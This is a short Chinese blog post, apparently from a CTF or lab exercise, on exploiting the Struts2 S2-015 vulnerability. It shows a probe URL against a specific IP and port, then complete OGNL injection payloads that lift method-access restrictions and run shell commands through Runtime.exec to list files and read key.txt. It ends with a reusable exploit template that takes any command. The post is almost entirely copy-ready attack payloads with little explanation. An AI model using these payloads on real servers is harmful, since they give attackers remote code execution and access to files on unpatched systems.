【Struts2-命令-代码执行突破分析系列】S2-015

时间:2020-04-16 15:34:26   收藏:0   阅读:152

测试漏洞

http://219.153.49.228:45828/${1+2}.action

 

 
技术图片
 

表达式进行了计算,表示漏洞存在,开始构造exp

读取当前文件夹的文件

${#context[xwork.MethodAccessor.denyMethodExecution]=false,#m=#_memberAccess.getClass().getDeclaredField(allowStaticMethodAccess),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(ls).getInputStream()),#q}.action

 

 

 
技术图片
 

 

读取key.txt

${#context[xwork.MethodAccessor.denyMethodExecution]=false,#m=#_memberAccess.getClass().getDeclaredField(allowStaticMethodAccess),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(cat key.txt).getInputStream()),#q}.action

 

 

 
技术图片
 

Exp代码:

${#context[xwork.MethodAccessor.denyMethodExecution]=false,#m=#_memberAccess.getClass().getDeclaredField(allowStaticMethodAccess),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec([命令]).getInputStream()),#q}.action

 

 

评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2  联系我们:gaon5@hotmail.com
迷上了代码!